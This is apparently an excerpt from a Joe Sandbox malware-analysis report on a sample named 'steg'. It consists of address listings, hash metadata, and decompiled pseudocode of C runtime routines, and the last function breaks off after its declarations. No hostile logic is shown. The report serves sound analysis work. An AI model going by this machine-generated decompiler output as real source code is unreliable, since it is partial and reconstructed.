                                                                                                                    0x00f8f732
                                                                                                                    0x00f8f733
                                                                                                                    0x00f8f734
                                                                                                                    0x00f8f735
                                                                                                                    0x00f8f736
                                                                                                                    0x00f8f737
                                                                                                                    0x00f8f738
                                                                                                                    0x00f8f747
                                                                                                                    0x00f8f74a
                                                                                                                    0x00f8f74b
                                                                                                                    0x00f8f75a
                                                                                                                    0x00f8f761
                                                                                                                    0x00f8f766
                                                                                                                    0x00f8f769
                                                                                                                    0x00f8f76b
                                                                                                                    0x00f8f76d
                                                                                                                    0x00f8f771
                                                                                                                    0x00f8f777
                                                                                                                    0x00f8f780
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f78b
                                                                                                                    0x00f8f790
                                                                                                                    0x00f8f7a2
                                                                                                                    0x00f8f7a8
                                                                                                                    0x00f8f7aa
                                                                                                                    0x00f8f7d7
                                                                                                                    0x00f8f7ed
                                                                                                                    0x00f8f805
                                                                                                                    0x00f8f81b
                                                                                                                    0x00f8f833
                                                                                                                    0x00f8f839
                                                                                                                    0x00f8f83e
                                                                                                                    0x00f8f841
                                                                                                                    0x00f8f843
                                                                                                                    0x00000000
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f84f
                                                                                                                    0x00f8f851
                                                                                                                    0x00000000
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f85e
                                                                                                                    0x00f8f863
                                                                                                                    0x00f8f864
                                                                                                                    0x00f8f869
                                                                                                                    0x00f8f86c
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f9e9
                                                                                                                    0x00f8f9e9
                                                                                                                    0x00f8f9ef
                                                                                                                    0x00f8f9fc
                                                                                                                    0x00f8f9fd
                                                                                                                    0x00f8f9ff
                                                                                                                    0x00f8fa08
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f883
                                                                                                                    0x00f8f888
                                                                                                                    0x00f8f891
                                                                                                                    0x00f8f893
                                                                                                                    0x00f8f8b4
                                                                                                                    0x00f8f8b9
                                                                                                                    0x00f8f8bc
                                                                                                                    0x00f8f8be
                                                                                                                    0x00f8f90a
                                                                                                                    0x00f8f90f
                                                                                                                    0x00f8f912
                                                                                                                    0x00f8f914
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f919
                                                                                                                    0x00f8f91f
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f929
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f930
                                                                                                                    0x00f8f931
                                                                                                                    0x00f8f937
                                                                                                                    0x00f8fa09
                                                                                                                    0x00f8fa0e
                                                                                                                    0x00f8fa0f
                                                                                                                    0x00f8fa10
                                                                                                                    0x00f8fa11
                                                                                                                    0x00f8fa12
                                                                                                                    0x00f8fa13
                                                                                                                    0x00f8fa14
                                                                                                                    0x00f8fa15
                                                                                                                    0x00f8fa16
                                                                                                                    0x00f8fa17
                                                                                                                    0x00f8fa1a
                                                                                                                    0x00f8fa1b
                                                                                                                    0x00f8fa1c
                                                                                                                    0x00f8fa21
                                                                                                                    0x00f8fa24
                                                                                                                    0x00f8fa2d
                                                                                                                    0x00f8fa32
                                                                                                                    0x00f8fa37
                                                                                                                    0x00f8fa40
                                                                                                                    0x00f8fa45
                                                                                                                    0x00f8fa4a
                                                                                                                    0x00f8fa53
                                                                                                                    0x00f8fa58
                                                                                                                    0x00f8fa5d
                                                                                                                    0x00f8fa69
                                                                                                                    0x00f8fa6e
                                                                                                                    0x00f8fa73
                                                                                                                    0x00f8fa7b
                                                                                                                    0x00f8fa85
                                                                                                                    0x00f8fa8d
                                                                                                                    0x00f8fa90
                                                                                                                    0x00f8fa9b
                                                                                                                    0x00f8faa6
                                                                                                                    0x00f8faab
                                                                                                                    0x00f8faae
                                                                                                                    0x00f8fab6
                                                                                                                    0x00f8fabb
                                                                                                                    0x00f8fabf
                                                                                                                    0x00f8fac8
                                                                                                                    0x00f8facd
                                                                                                                    0x00f8fad2
                                                                                                                    0x00f8fadb
                                                                                                                    0x00f8fae0
                                                                                                                    0x00f8fae5
                                                                                                                    0x00f8faf1
                                                                                                                    0x00f8faf6
                                                                                                                    0x00f8fafb
                                                                                                                    0x00f8fb04
                                                                                                                    0x00f8fb0c
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb13
                                                                                                                    0x00f8fb15
                                                                                                                    0x00f8fb1b
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93e
                                                                                                                    0x00f8f951
                                                                                                                    0x00f8f956
                                                                                                                    0x00f8f95c
                                                                                                                    0x00f8f95f
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f969
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f970
                                                                                                                    0x00f8f976
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f97b
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f982
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f989
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98e
                                                                                                                    0x00f8f995
                                                                                                                    0x00f8f998
                                                                                                                    0x00f8f99d
                                                                                                                    0x00f8f99f
                                                                                                                    0x00f8f9a2
                                                                                                                    0x00f8f9a4
                                                                                                                    0x00f8f9af
                                                                                                                    0x00f8f9bb
                                                                                                                    0x00f8f9c9
                                                                                                                    0x00f8f9d5
                                                                                                                    0x00f8f9da
                                                                                                                    0x00f8f9e0
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8f895
                                                                                                                    0x00f8f89b
                                                                                                                    0x00f8f8a0
                                                                                                                    0x00f8f8a3
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8cc
                                                                                                                    0x00f8f8d1
                                                                                                                    0x00f8f8d2
                                                                                                                    0x00f8f8d7
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8de
                                                                                                                    0x00f8f8e4
                                                                                                                    0x00f8f8ee
                                                                                                                    0x00f8f8ef
                                                                                                                    0x00f8f8f3
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f851
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7b2
                                                                                                                    0x00f8f7b2
                                                                                                                    0x00f8f7b5
                                                                                                                    0x00f8f7b9
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00000000
                                                                                                                    0x00f8f6fc
                                                                                                                    0x00f8f6fa
                                                                                                                    0x00f8f69a
                                                                                                                    0x00f8f626
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _malloc_memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4137368368-2967466578
                                                                                                                    • Opcode ID: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction ID: cc097bce7ccd19bc8879a55a626e641e6570c49c2fc0ee38422b0305bfd69e4f
                                                                                                                    • Opcode Fuzzy Hash: ccb84bc1d03478e58a9c485c33e6a5a62e6b55d56d23c6fb50a5dc27b78ba8bb
                                                                                                                    • Instruction Fuzzy Hash: 59412031D042599FDF20EB20CC45BEDB7A8AF14314F1001F9E889E6052EBB19BCD9B40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 010710E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E010710E8(signed int _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				void* _t58;
				signed int _t60;
				void* _t62;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				signed int _t73;
				void* _t74;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				signed int* _t85;

				_t85 = _a8;
				_t43 = E01072BC8(_t85);
				_t71 = _t85[3];
				_t84 = _t43;
				if((_t71 & 0x00000082) != 0) {
					__eflags = _t71 & 0x00000040;
					if((_t71 & 0x00000040) == 0) {
						_t68 = 0;
						__eflags = _t71 & 0x00000001;
						if((_t71 & 0x00000001) == 0) {
							L8:
							_t46 = _t85[3] & 0xffffffef | 0x00000002;
							_t85[3] = _t46;
							_t85[1] = _t68;
							__eflags = _t46 & 0x0000010c;
							if((_t46 & 0x0000010c) != 0) {
								L13:
								__eflags = _t85[3] & 0x00000108;
								if((_t85[3] & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_a8 = 1;
									_push( &_a4);
									_push(_t84);
									_t43 = E010797EF(_t68, _t84, _t85, 1);
									_t68 = _t43;
									L25:
									__eflags = _t68 - _a8;
									if(_t68 == _a8) {
										_t50 = _a4 & 0x000000ff;
										L29:
										return _t50;
									}
									L26:
									_t40 =  &(_t85[3]);
									 *_t40 = _t85[3] | 0x00000020;
									__eflags =  *_t40;
									L27:
									_t50 = _t43 | 0xffffffff;
									goto L29;
								}
								_t83 = _t85[2];
								 *_t85 = _t83 + 1;
								_t73 =  *_t85 - _t83;
								_a8 = _t73;
								_t85[1] = _t85[6] - 1;
								__eflags = _t73;
								if(__eflags <= 0) {
									__eflags = _t84 - 0xffffffff;
									if(_t84 == 0xffffffff) {
										L20:
										_t74 = 0x483640;
										L21:
										__eflags =  *(_t74 + 4) & 0x00000020;
										if(__eflags == 0) {
											L23:
											_t43 = _a4;
											 *(_t85[2]) = _t43;
											goto L25;
										}
										_push(2);
										_push(_t68);
										_push(_t68);
										_push(_t84);
										_t43 = E0107A0FB(_t68, _t84, _t85, __eflags) & _t83;
										__eflags = _t43 - 0xffffffff;
										if(_t43 == 0xffffffff) {
											goto L26;
										}
										goto L23;
									}
									__eflags = _t84 - 0xfffffffe;
									if(_t84 == 0xfffffffe) {
										goto L20;
									}
									_t74 = ((_t84 & 0x0000001f) << 6) +  *((intOrPtr*)(0x48b030 + (_t84 >> 5) * 4));
									goto L21;
								}
								_push(_t73);
								_push(_t83);
								_push(_t84);
								_t68 = E010797EF(_t68, _t84, _t85, __eflags);
								goto L23;
							}
							_t58 = E01072C86();
							__eflags = _t85 - _t58 + 0x20;
							if(_t85 == _t58 + 0x20) {
								L11:
								_t60 = E0107979B(_t84);
								__eflags = _t60;
								if(_t60 != 0) {
									goto L13;
								}
								L12:
								E0107A268(_t85);
								goto L13;
							}
							_t62 = E01072C86();
							__eflags = _t85 - _t62 + 0x40;
							if(_t85 != _t62 + 0x40) {
								goto L12;
							}
							goto L11;
						}
						_t85[1] = 0;
						__eflags = _t71 & 0x00000010;
						if((_t71 & 0x00000010) == 0) {
							_t85[3] = _t71 | 0x00000020;
							goto L27;
						}
						_t82 = _t71 & 0xfffffffe;
						__eflags = _t82;
						 *_t85 = _t85[2];
						_t85[3] = _t82;
						goto L8;
					}
					_t65 = E01070A4A();
					 *_t65 = 0x22;
					L2:
					_t85[3] = _t85[3] | 0x00000020;
					return _t65 | 0xffffffff;
				}
				_t65 = E01070A4A();
				 *_t65 = 9;
				goto L2;
			}






















                                                                                                                    0x010710ec
                                                                                                                    0x010710f1
                                                                                                                    0x010710f7
                                                                                                                    0x010710fa
                                                                                                                    0x010710ff
                                                                                                                    0x01071118
                                                                                                                    0x0107111b
                                                                                                                    0x0107112b
                                                                                                                    0x0107112d
                                                                                                                    0x01071130
                                                                                                                    0x01071145
                                                                                                                    0x0107114b
                                                                                                                    0x0107114e
                                                                                                                    0x01071151
                                                                                                                    0x01071154
                                                                                                                    0x01071159
                                                                                                                    0x01071185
                                                                                                                    0x01071185
                                                                                                                    0x0107118c
                                                                                                                    0x0107120a
                                                                                                                    0x0107120b
                                                                                                                    0x0107120c
                                                                                                                    0x01071212
                                                                                                                    0x01071213
                                                                                                                    0x01071214
                                                                                                                    0x0107121c
                                                                                                                    0x0107121e
                                                                                                                    0x0107121e
                                                                                                                    0x01071221
                                                                                                                    0x0107122c
                                                                                                                    0x01071230
                                                                                                                    0x00000000
                                                                                                                    0x01071230
                                                                                                                    0x01071223
                                                                                                                    0x01071223
                                                                                                                    0x01071223
                                                                                                                    0x01071223
                                                                                                                    0x01071227
                                                                                                                    0x01071227
                                                                                                                    0x00000000
                                                                                                                    0x01071227
                                                                                                                    0x0107118e
                                                                                                                    0x01071196
                                                                                                                    0x0107119b
                                                                                                                    0x0107119e
                                                                                                                    0x010711a1
                                                                                                                    0x010711a4
                                                                                                                    0x010711a6
                                                                                                                    0x010711bf
                                                                                                                    0x010711c2
                                                                                                                    0x010711df
                                                                                                                    0x010711df
                                                                                                                    0x010711e4
                                                                                                                    0x010711e4
                                                                                                                    0x010711e8
                                                                                                                    0x010711fe
                                                                                                                    0x01071201
                                                                                                                    0x01071204
                                                                                                                    0x00000000
                                                                                                                    0x01071204
                                                                                                                    0x010711ea
                                                                                                                    0x010711ec
                                                                                                                    0x010711ed
                                                                                                                    0x010711ee
                                                                                                                    0x010711f4
                                                                                                                    0x010711f9
                                                                                                                    0x010711fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010711fc
                                                                                                                    0x010711c4
                                                                                                                    0x010711c7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010711d6
                                                                                                                    0x00000000
                                                                                                                    0x010711d6
                                                                                                                    0x010711a8
                                                                                                                    0x010711a9
                                                                                                                    0x010711aa
                                                                                                                    0x010711b3
                                                                                                                    0x00000000
                                                                                                                    0x010711b3
                                                                                                                    0x0107115b
                                                                                                                    0x01071163
                                                                                                                    0x01071165
                                                                                                                    0x01071173
                                                                                                                    0x01071174
                                                                                                                    0x0107117a
                                                                                                                    0x0107117c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0107117e
                                                                                                                    0x0107117f
                                                                                                                    0x00000000
                                                                                                                    0x01071184
                                                                                                                    0x01071167
                                                                                                                    0x0107116f
                                                                                                                    0x01071171
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01071171
                                                                                                                    0x01071132
                                                                                                                    0x01071135
                                                                                                                    0x01071138
                                                                                                                    0x010711ba
                                                                                                                    0x00000000
                                                                                                                    0x010711ba
                                                                                                                    0x0107113d
                                                                                                                    0x0107113d
                                                                                                                    0x01071140
                                                                                                                    0x01071142
                                                                                                                    0x00000000
                                                                                                                    0x01071142
                                                                                                                    0x0107111d
                                                                                                                    0x01071122
                                                                                                                    0x0107110c
                                                                                                                    0x0107110c
                                                                                                                    0x00000000
                                                                                                                    0x01071110
                                                                                                                    0x01071101
                                                                                                                    0x01071106
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 01070A4A: __getptd_noexit.LIBCMT ref: 01070A4A
                                                                                                                    • __getbuf.LIBCMT ref: 0107117F
                                                                                                                    • __lseeki64.LIBCMT ref: 010711EF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                    • String ID: @6H
                                                                                                                    • API String ID: 3311320906-2126515205
                                                                                                                    • Opcode ID: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction ID: b0279771a5cec56810d7e593a0a9aeeeb3be1a3d7b1a021185e40878c98f9821
                                                                                                                    • Opcode Fuzzy Hash: c181a644f904a2487bfcdad304fa3f83af33a5787edb318873f16d71bbf40be4
                                                                                                                    • Instruction Fuzzy Hash: 3B4124B1D007069ED3659F6CD850ABA7BE4AB45330B04C76DE9FACB6D0D73494418B58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FCF727 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00FCF727(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t35;
				intOrPtr _t40;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t48;
				void* _t51;

				_t46 = _a8;
				if(_t46 == 0) {
					_t47 = E00FC91B7(0x44);
					if(_t47 == 0) {
						goto L14;
					} else {
						E00FE7C87(_t47, 0, 0x44);
						goto L13;
					}
				} else {
					_t2 = _t46 + 4; // 0x41895600
					_t44 =  *_t2;
					E00FB9DF7(_t46);
					_t51 = _t48 + 4;
					if( *((intOrPtr*)(_t44 + 0x28)) == 0) {
						_t40 = E00FC91B7(0x44);
						_t51 = _t51 + 4;
						if(_t40 != 0) {
							E00FE7C87(_t40, 0, 0x44);
							_t51 = _t51 + 0xc;
						}
						 *((intOrPtr*)(_t44 + 0x28)) = _t40;
						 *((intOrPtr*)(_t44 + 0x2c)) = 0x444e30;
					}
					if( *((char*)(_t46 + 9)) != 0) {
						_t7 = _t46 + 0xc;
						 *_t7 =  *((intOrPtr*)(_t46 + 0xc)) - 1;
						if( *_t7 == 0) {
							_t9 = _t46 + 4; // 0x41895600
							_t35 =  *((intOrPtr*)( *_t9 + 0x30));
							if(_t35 != 0) {
								 *0x481858(_t35);
							}
							 *((char*)(_t46 + 0xa)) = 0;
						}
					}
					_t47 =  *((intOrPtr*)(_t44 + 0x28));
					L13:
					if(_t47 != 0) {
						if( *((char*)(_t47 + 0x38)) == 0) {
							 *((intOrPtr*)(_t47 + 0xc)) = 0;
							 *((intOrPtr*)(_t47 + 8)) = 0;
							 *((intOrPtr*)(_t47 + 4)) = 0;
							 *((intOrPtr*)(_t47 + 0x10)) = 0;
							 *((intOrPtr*)(_t47 + 0x1c)) = 0;
							 *((intOrPtr*)(_t47 + 0x18)) = 0;
							 *((intOrPtr*)(_t47 + 0x14)) = 0;
							 *((intOrPtr*)(_t47 + 0x20)) = 0;
							 *((intOrPtr*)(_t47 + 0x2c)) = 0;
							 *((intOrPtr*)(_t47 + 0x28)) = 0;
							 *((intOrPtr*)(_t47 + 0x24)) = 0;
							 *((intOrPtr*)(_t47 + 0x30)) = 0;
							 *((char*)(_t47 + 0x39)) = 1;
						}
						return _t47;
					} else {
						L14:
						 *((char*)(_a4 + 0x1e)) = 1;
						return _t47;
					}
				}
			}










                                                                                                                    0x00fcf72b
                                                                                                                    0x00fcf730
                                                                                                                    0x00fcf79e
                                                                                                                    0x00fcf7a5
                                                                                                                    0x00000000
                                                                                                                    0x00fcf7a7
                                                                                                                    0x00fcf7ac
                                                                                                                    0x00000000
                                                                                                                    0x00fcf7b1
                                                                                                                    0x00fcf732
                                                                                                                    0x00fcf733
                                                                                                                    0x00fcf733
                                                                                                                    0x00fcf737
                                                                                                                    0x00fcf73c
                                                                                                                    0x00fcf743
                                                                                                                    0x00fcf74d
                                                                                                                    0x00fcf74f
                                                                                                                    0x00fcf754
                                                                                                                    0x00fcf75b
                                                                                                                    0x00fcf760
                                                                                                                    0x00fcf760
                                                                                                                    0x00fcf763
                                                                                                                    0x00fcf766
                                                                                                                    0x00fcf76d
                                                                                                                    0x00fcf772
                                                                                                                    0x00fcf774
                                                                                                                    0x00fcf774
                                                                                                                    0x00fcf777
                                                                                                                    0x00fcf779
                                                                                                                    0x00fcf77c
                                                                                                                    0x00fcf781
                                                                                                                    0x00fcf784
                                                                                                                    0x00fcf78a
                                                                                                                    0x00fcf78d
                                                                                                                    0x00fcf78d
                                                                                                                    0x00fcf777
                                                                                                                    0x00fcf791
                                                                                                                    0x00fcf7b4
                                                                                                                    0x00fcf7b6
                                                                                                                    0x00fcf7c8
                                                                                                                    0x00fcf7ca
                                                                                                                    0x00fcf7d1
                                                                                                                    0x00fcf7d8
                                                                                                                    0x00fcf7df
                                                                                                                    0x00fcf7e6
                                                                                                                    0x00fcf7ed
                                                                                                                    0x00fcf7f4
                                                                                                                    0x00fcf7fb
                                                                                                                    0x00fcf802
                                                                                                                    0x00fcf809
                                                                                                                    0x00fcf810
                                                                                                                    0x00fcf817
                                                                                                                    0x00fcf81e
                                                                                                                    0x00fcf81e
                                                                                                                    0x00fcf826
                                                                                                                    0x00fcf7b8
                                                                                                                    0x00fcf7b8
                                                                                                                    0x00fcf7bd
                                                                                                                    0x00fcf7c3
                                                                                                                    0x00fcf7c3
                                                                                                                    0x00fcf7b6

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 0ND
                                                                                                                    • API String ID: 2102423945-3294747520
                                                                                                                    • Opcode ID: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction ID: fa54c6a4f6299cbfb3a2f335023b58e04c4dbd103e9a2ed8b2e9264926c466bc
                                                                                                                    • Opcode Fuzzy Hash: a267b99868b94a5e31cdba44be911531a2e8406c5c1b768cd4217eca78ce4061
                                                                                                                    • Instruction Fuzzy Hash: FE31D2B1900B019BE3309F15D946B43FBE5AF04728F14452CD98A1BB81D3BAF9488BC5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FF3AC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00FF3AC8(void* __ebx, void* __edx, void* __esi, void* __eflags) {
				intOrPtr* _v20;
				void* _t4;
				intOrPtr* _t7;
				intOrPtr _t9;

				_t4 = E00FF6B56(0, 0x10000, 0x30000);
				if(_t4 != 0) {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00FEC6A6(_t4, __ebx, __edx);
					asm("int3");
					_t7 =  *_v20;
					if( *_t7 != 0xe06d7363 ||  *((intOrPtr*)(_t7 + 0x10)) != 3) {
						L8:
						return 0;
					} else {
						_t9 =  *((intOrPtr*)(_t7 + 0x14));
						if(_t9 == 0x19930520 || _t9 == 0x19930521 || _t9 == 0x19930522 || _t9 == 0x1994000) {
							E00FEE9C8();
							asm("int3");
							E00FEDE7A(0x469378);
							return 0;
						} else {
							goto L8;
						}
					}
				} else {
					return _t4;
				}
			}







                                                                                                                    0x00ff3ad6
                                                                                                                    0x00ff3ae0
                                                                                                                    0x00ff3ae4
                                                                                                                    0x00ff3ae5
                                                                                                                    0x00ff3ae6
                                                                                                                    0x00ff3ae7
                                                                                                                    0x00ff3ae8
                                                                                                                    0x00ff3ae9
                                                                                                                    0x00ff3aee
                                                                                                                    0x00ff3af5
                                                                                                                    0x00ff3afd
                                                                                                                    0x00ff3b24
                                                                                                                    0x00ff3b27
                                                                                                                    0x00ff3b05
                                                                                                                    0x00ff3b05
                                                                                                                    0x00ff3b0d
                                                                                                                    0x00ff3b2a
                                                                                                                    0x00ff3b2f
                                                                                                                    0x00ff3b35
                                                                                                                    0x00ff3b3d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00ff3b0d
                                                                                                                    0x00ff3ae2
                                                                                                                    0x00ff3ae3
                                                                                                                    0x00ff3ae3

                                                                                                                    APIs
                                                                                                                    • __controlfp_s.LIBCMT ref: 00FF3AD6
                                                                                                                      • Part of subcall function 00FF6B56: __control87.LIBCMT ref: 00FF6B7A
                                                                                                                    • __invoke_watson.LIBCMT ref: 00FF3AE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __control87__controlfp_s__invoke_watson
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1371525046-1018135373
                                                                                                                    • Opcode ID: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction ID: 2c2c3538a5aa928b17b40cf6fde73250ac381c7853f724ed8fd7ea2aaf786a32
                                                                                                                    • Opcode Fuzzy Hash: 4b53eaab42b9ff57573e2217751ed2f7392e9cf52e54f971a8c1ca2ad5afeed9
                                                                                                                    • Instruction Fuzzy Hash: 99F02431900209868B3AAA6A6C49ABE73CD5F90321F550401FB08CB532EFD4CF80E096
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0009E75C Relevance: 46.9, APIs: 31, Instructions: 416COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 53%
                                                                                                                    			E0009E75C(void* __ebx, void* __esi, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char* _v96;
				intOrPtr* _v100;
				char _v104;
				signed char _v105;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				char _v135;
				char _v136;
				char _v164;
				char _v216;
				char* _v220;
				intOrPtr* _v224;
				char _v263;
				char _v264;
				char _v292;
				char _v391;
				char _v392;
				char _v420;
				char _v519;
				char _v520;
				char _v548;
				char _v647;
				char _v648;
				char _v903;
				char _v904;
				char _v1048;
				char _v1404;
				char _v1560;
				char _v1915;
				char _v1916;
				char _v2072;
				char _v2427;
				char _v2428;
				long _v2584;
				char _v3096;
				char _v4120;
				char _v4632;
				signed int _v4636;
				signed int _v4640;
				signed int _v4644;
				signed int _v4648;
				intOrPtr _v4652;
				signed int _v4656;
				char _v7428;
				char _v12428;
				char _v12432;
				void* __edi;
				void* __ebp;
				char _t231;
				void* _t252;
				char* _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				intOrPtr _t260;
				intOrPtr _t261;
				char* _t265;
				signed int _t268;
				char* _t280;
				signed int _t283;
				char _t298;
				void* _t305;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				signed int _t315;
				void* _t317;
				signed int _t319;
				signed int _t320;
				char* _t321;
				signed int _t324;
				signed int _t327;
				signed int _t330;
				signed int _t333;
				void* _t336;
				signed int _t348;
				signed int _t362;
				signed int _t363;
				signed int _t368;
				signed int _t371;
				signed int _t396;
				signed int _t416;
				signed int _t422;
				signed int _t423;
				signed int _t429;
				signed int _t439;
				intOrPtr _t441;
				void* _t465;
				void* _t468;
				void* _t470;
				void* _t472;
				signed int _t473;
				void* _t474;
				signed int _t475;
				char* _t476;
				void* _t477;
				intOrPtr _t478;
				void* _t479;
				void* _t480;
				void* _t481;
				void* _t482;
				void* _t483;
				intOrPtr* _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr* _t500;
				void* _t501;
				void* _t502;
				signed int _t506;
				signed int _t509;
				signed int _t510;
				signed int _t511;
				intOrPtr* _t512;
